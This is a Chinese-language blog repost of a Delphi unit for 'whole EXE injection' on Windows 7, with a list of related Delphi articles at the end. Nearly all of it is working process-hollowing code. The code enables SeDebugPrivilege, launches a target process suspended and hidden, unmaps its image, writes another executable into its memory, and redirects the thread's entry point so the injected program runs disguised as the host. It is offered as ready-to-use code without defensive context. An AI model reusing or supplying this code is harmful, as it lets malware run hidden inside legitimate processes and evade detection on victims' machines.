delphi 注入WIN7的单元

本文整理自网络，侵删。

  
EXE整体注入
intject.pas
unit intject;
interface
uses
Windows;
var
ZwUnmapViewOfSection:function(ProcessHandle:thandle; BaseAddress:Pointer):LongInt; stdcall;
CreateProcessX:function(lpApplicationName: PChar; lpCommandLine: PChar;
lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
lpCurrentDirectory: PChar; const lpStartupInfo: TStartupInfo;
var lpProcessInformation: TProcessInformation): BOOL; stdcall;
//external 'ntdll.dll' name 'ZwUnmapViewOfSection';
type
PImageSectionHeaders = ^TImageSectionHeaders;
TImageSectionHeaders = Array [0..95] Of TImageSectionHeader;
procedure InJect(path,path1:string);
implementation
function ImageFirstSection(NTHeader: PImageNTHeaders): PImageSectionHeader;
Begin
Result := PImageSectionheader(Cardinal(@NTheader.OptionalHeader) +
NTHeader.FileHeader.SizeOfOptionalHeader);
End;
function Protect(Characteristics: ULONG): ULONG;
Const
Mapping :Array[0..7] Of ULONG = (
           PAGE_NOACCESS,
           PAGE_EXECUTE,
           PAGE_READONLY,
           PAGE_EXECUTE_READ,
           PAGE_READWRITE,
           PAGE_EXECUTE_READWRITE,
           PAGE_READWRITE,
           PAGE_EXECUTE_READWRITE);
Begin
Result := Mapping[ Characteristics SHR 29 ];
End;
procedure SetPrivilege;
var
currToken:THandle;
newState:TTokenPrivileges;
prevStateLen:DWORD;
Luid: TLargeInteger;
begin
if OpenProcessToken(GetCurrentProcess,TOKEN_ADJUST_PRIVILEGES,currToken) then //获得进程访问令牌的句柄
begin
    if LookupPrivilegeValue(nil, 'SeDebugPrivilege',Luid) then
    begin
      newState.PrivilegeCount:=1;
      newState.Privileges[0].Attributes:=2;
      newState.Privileges[0].Luid:=Luid;
      prevStateLen:=0;
      AdjustTokenPrivileges(currToken, False, newState, sizeof(TTokenPrivileges),nil, prevStateLen);
    end;
end;
end;
procedure InTo(Buffer: Pointer; ProcessName: String);
Var
ProcessInfo           :TProcessInformation;
StartupInfo           :TStartupInfo;
Context               :TContext;
BaseAddress           :Pointer;
BytesRead             :DWORD;
BytesWritten          :DWORD;
I                     :ULONG;
OldProtect            :ULONG;
NTHeaders             :PImageNTHeaders;
Sections              :PImageSectionHeaders;
Kernel,ntdll:LongWord;
Begin
FillChar(ProcessInfo, SizeOf(TProcessInformation), 0);
fillChar(StartupInfo, SizeOf(TStartupInfo),        0);
StartupInfo.cb := SizeOf(TStartupInfo);
StartupInfo.wShowWindow := SW_HIDE;
{$IFDEF UNICODE}
Kernel:=LoadLibrary('kernel32.dll');
@CreateProcessX := GetProcAddress(Kernel,'CreateProcessW');
{$ELSE}
Kernel:=LoadLibraryW('kernel32.dll');
@CreateProcessX := GetProcAddress(Kernel,'CreateProcessA');
{$ENDIF}
ntdll:=LoadLibrary('ntdll.dll');
ZwUnmapViewOfSection:=GetProcAddress(ntdll,'ZwUnmapViewOfSection');
SetPrivilege;
CreateProcessX(nil,PChar(ProcessName), NIL, NIL, false, CREATE_SUSPENDED, NIL, NIL, StartupInfo, ProcessInfo);
FreeLibrary(Kernel);
Context.ContextFlags := CONTEXT_INTEGER;
GetThreadContext(ProcessInfo.hThread, Context);
ReadProcessMemory(ProcessInfo.hProcess, Pointer(Context.Ebx + 8), @BaseAddress, SizeOf(BaseAddress), BytesRead);
ZwUnmapViewOfSection(ProcessInfo.hProcess, BaseAddress);
if not Assigned(Buffer) then exit;
NTHeaders:= PImageNTHeaders(Cardinal(Buffer) + Cardinal(PImageDosHeader(Buffer)._lfanew));
BaseAddress:= VirtualAllocEx(ProcessInfo.hProcess, Pointer(NTHeaders.OptionalHeader.ImageBase), NTHeaders.OptionalHeader.SizeOfImage,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE);
If not Assigned(BaseAddress) then exit;
WriteProcessMemory(ProcessInfo.hProcess, BaseAddress, Buffer, NTHeaders.OptionalHeader.SizeOfHeaders,BytesWritten);
Sections := PImageSectionHeaders(ImageFirstSection(NTHeaders));
For I := 0 To NTHeaders.FileHeader.NumberOfSections -1 Do
begin
    WriteProcessMemory(ProcessInfo.hProcess,Pointer(Cardinal(BaseAddress)+Sections[I].VirtualAddress), Pointer(Cardinal(Buffer) + Sections[I].PointerToRawData), Sections[I].SizeOfRawData, BytesWritten);
    VirtualProtectEx(ProcessInfo.hProcess,Pointer(Cardinal(BaseAddress)+ Sections[I].VirtualAddress),Sections[I].Misc.VirtualSize,
    Protect(Sections[I].Characteristics),OldProtect);
end;
WriteProcessMemory(ProcessInfo.hProcess,Pointer(Context.Ebx + 8), @BaseAddress, SizeOf(BaseAddress), BytesWritten);
Context.Eax := ULONG(BaseAddress)+NTHeaders.OptionalHeader.AddressOfEntryPoint;
Context.SegGs:=0;
Context.SegFs:=$38;
Context.SegEs:=$20;
Context.SegDs:=$20;
Context.SegSs:=$20;
Context.SegCs:=$18;
Context.EFlags:=$3000;
FreeLibrary(ntdll);
if not SetThreadContext(ProcessInfo.hThread, Context) then
        TerminateProcess(ProcessInfo.hProcess, 0)
Else resumeThread(ProcessInfo.hThread);
End;
procedure InJect(path,path1:string);
var
   BytesRead, Module, Size: dword;
   Data: pointer;
begin
    Module := CreateFile(pchar(path), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
    Size := GetFileSize(Module, nil);
    GetMem(Data, size);
    ReadFile(Module, Data^, size, BytesRead, nil);
    InTo(data,path1);
    CloseHandle(Module);
    freemem(data);
end;
end.
 

相关阅读 >>

Delphi获取文件创建时间、文件最后修改时间

Delphi mscomm 比较完整的用法例子

Delphi webbrowser 无法调用当前浏览器的版本

Delphi 拦截tab按键消息

Delphi入门语法

Delphi程序在每个windows 会话中只执行一次

Delphi filestream

Delphi unigui中如何监听session的开始与结束

Delphi 打开win8及以上操作系统的系统已安装程序目录

Delphi获取当前计算机所有盘符

更多相关阅读请进入《Delphi》频道 >>

转载请注明出处：木庄网络博客 » delphi 注入WIN7的单元